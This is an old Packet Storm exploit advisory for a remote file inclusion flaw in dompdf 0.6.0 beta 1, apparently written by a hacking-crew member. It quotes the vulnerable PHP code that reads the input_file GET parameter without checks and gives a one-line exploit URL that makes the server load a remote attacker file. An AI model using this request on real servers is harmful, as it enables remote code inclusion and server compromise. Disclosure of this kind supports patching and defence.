Dompdf 0.6.0 Beta 1 Remote File Inclusion

2010-09-01T00:00:00
ID PACKETSTORM:93391
Type packetstorm
Reporter Andre Corleone
Modified 2010-09-01T00:00:00

Description

                                        
                                            `==================================  
apps dompdf RFI Vulnerability  
==================================  
  
====================================================  
[x] ExpL0it TitLe : apps dompdf RFI Vulnerability  
[x] DatE : 01 September 2010  
[x] AutH0r : Andre_Corleone  
[x] Software Link : www.digitaljunkies.ca/dompdf/  
[x] h0mE : http://tecon-crew.org  
[x] TestEd 0n : linux ubuntu 10.04  
[x] d0rK : :P  
====================================================  
  
==========================================================================================  
[x]bug heRe:  
if ( isset($_GET["input_file"]) )  
$file = rawurldecode($_GET["input_file"]);  
else  
throw new DOMPDF_Exception("An input file is required (i.e. input_file _GET variable).");  
==========================================================================================  
  
==================================================================  
[x]expL0iT:  
http://www.site.com/dompdf/dompdf.php?input_file=[evilc0de.txt?]  
==================================================================  
  
============================================================================================  
[x]th4nKs t0:  
ALLAH SWT,Muhammad SAW,my Parents,my lovely HerliZ Dian Permathasari  
guitariznoize | zee_eichel | jImMYrOmAnTiCdEvIl | 45tr0_k1ll1n9 | all Tecon Crew | and you  
============================================================================================  
  
=====================  
[x]Jakarta,Indonesia  
=====================  
  
`